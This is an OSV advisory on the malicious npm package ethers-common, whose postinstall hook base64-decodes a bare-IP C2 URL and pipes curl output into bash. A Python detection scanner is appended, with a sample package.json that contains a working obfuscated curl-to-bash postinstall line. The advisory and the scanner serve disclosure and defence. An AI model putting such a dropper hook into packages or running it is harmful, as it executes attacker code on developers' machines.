MAL-2026-3707

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-common/MAL-2026-3707.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-3707
Published
2026-05-13T11:58:47Z
Modified
2026-05-15T07:53:09.429195Z
Summary
Malicious code in ethers-common (npm)
Details

Source: amazon-inspector (9a7b953533124edcc31e4293ed6bffe010e9110d795f812ba432de8b81d4d558)

package.json declares a postinstall hook that base64-decodes the URL http://8.217.75.147:3000/payload, fetches it with curl over plain HTTP, and pipes the response directly into bash. This executes attacker-controlled code on every installer's machine at npm install time, with no integrity verification and a base64-obfuscated destination. The package itself is a hollow lure: index.js exports an empty object, and the package name and description ("Utilities for Web3/ethers development") impersonate the well-known ethers Web3 library to bait installs. The combination of a bare-IP C2 address, plain HTTP, a base64-obfuscated URL, a curl|bash dropper in a lifecycle hook, and an empty cover-story library is an unambiguous supply-chain attack.

Source: ossf-package-analysis (48af3bdbd3b7966516ff3ab4baf1a946a38ce1735dc0c8fb41b2bc9abfa30449)

The OpenSSF Package Analysis project identified 'ethers-common' @ 1.0.0 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.
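As an added example (not part of this advisory and not tooling from OSV, Amazon Inspector or the OpenSSF project), the Python scanner below flags the combination described above in a package.json: a lifecycle hook whose command base64-decodes a bare-IP, plain-HTTP URL and pipes curl output into a shell. The indicator names, regular expressions and the sample package.json are constructed for illustration; the sample uses a documentation IP address rather than the one from the report.

```python
import base64
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")  # run by npm install
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|\b)")
PLAIN_HTTP = re.compile(r"\bhttp://")
FETCHER = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba|z|da)?sh\b")

def decode_b64_tokens(command):
    """Return printable strings hidden inside base64-looking tokens of a command."""
    hidden = []
    for match in B64_TOKEN.finditer(command):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore the token
        if text.isprintable():
            hidden.append(text)
    return hidden

def analyze_script(command):
    """Return the indicator names triggered by one lifecycle script command."""
    hidden = decode_b64_tokens(command)
    expanded = command + " " + " ".join(hidden)  # also inspect the de-obfuscated form
    indicators = []
    if hidden:
        indicators.append("base64-obfuscated string")
    if BARE_IP_URL.search(expanded):
        indicators.append("bare-IP URL")
    if PLAIN_HTTP.search(expanded):
        indicators.append("plain HTTP download")
    if FETCHER.search(command) and PIPE_TO_SHELL.search(command):
        indicators.append("remote content piped to shell")
    return indicators

def scan_package_json(raw):
    """Map each lifecycle hook in a package.json document to the indicators it trips."""
    scripts = json.loads(raw).get("scripts", {})
    return {hook: hits for hook in LIFECYCLE_HOOKS
            if (hits := analyze_script(scripts.get(hook, "")))}

# Constructed sample mirroring the advisory's pattern; the address is a documentation
# IP (198.51.100.7), not the indicator from the report.
ENCODED_SAMPLE_URL = base64.b64encode(b"http://198.51.100.7:3000/payload").decode()
SAMPLE_PACKAGE_JSON = json.dumps({"name": "example-lure", "version": "1.0.0", "scripts": {
    "postinstall": f"curl -s $(echo {ENCODED_SAMPLE_URL} | base64 -d) | bash", "test": "node test.js"}})
```

Running `scan_package_json` over a package's package.json before install (or in CI on lockfile changes) reports which hooks trip which indicators; a legitimate build script with no fetch-and-execute pattern returns an empty report.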
Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-05-13T21:58:24.228904145Z",
            "sha256": "48af3bdbd3b7966516ff3ab4baf1a946a38ce1735dc0c8fb41b2bc9abfa30449",
            "source": "ossf-package-analysis",
            "modified_time": "2026-05-13T11:58:47Z",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "import_time": "2026-05-13T21:58:24.971817131Z",
            "sha256": "9e00b24a32d5d4b92af87962a2fa77bc1f04e333744e353363356c1ba22f566e",
            "source": "ossf-package-analysis",
            "modified_time": "2026-05-13T12:00:47Z",
            "versions": [
                "2.0.0"
            ]
        },
        {
            "id": "IN-MAL-2026-002710",
            "import_time": "2026-05-15T07:37:17.652338172Z",
            "sha256": "0b13b1ccfe277b0f90374ea218d61f0b9f61ddef086b2444a679913a6551ac21",
            "source": "amazon-inspector",
            "modified_time": "2026-05-14T19:25:17Z",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "id": "IN-MAL-2026-002807",
            "import_time": "2026-05-15T07:37:20.144273474Z",
            "sha256": "9a7b953533124edcc31e4293ed6bffe010e9110d795f812ba432de8b81d4d558",
            "source": "amazon-inspector",
            "modified_time": "2026-05-15T03:08:28Z",
            "versions": [
                "1.0.0"
            ]
        }
    ]
}

Affected packages

Package: npm / ethers-common

Affected ranges and versions:
  1.*  ->  1.0.0
  2.*  ->  2.0.0

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "78c042ae0304ee61a00ec5eb1b5d7c64892b6aa61e3a388902439f6118193961",
            "tlsh": "34f0ab009b506ab328c49f920e1ea6cb6073891700587c54b38fa06d03dd7af14ff55e"
        }
    ],
    "package_integrity": [
        {
            "filename": "ethers-common-1.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-J9u5EDtc+Vh39s9ww94BquNv+4/m/BzKkuFjZBZPbnpAQSVioTcDVP+KBSMj+mOoa+9eTJbQ2KEROpN8TgXcJg==",
                "sha1": "d6049be5c41b2bdde1f0a2429665b0386a9d1b55"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-common/MAL-2026-3707.json"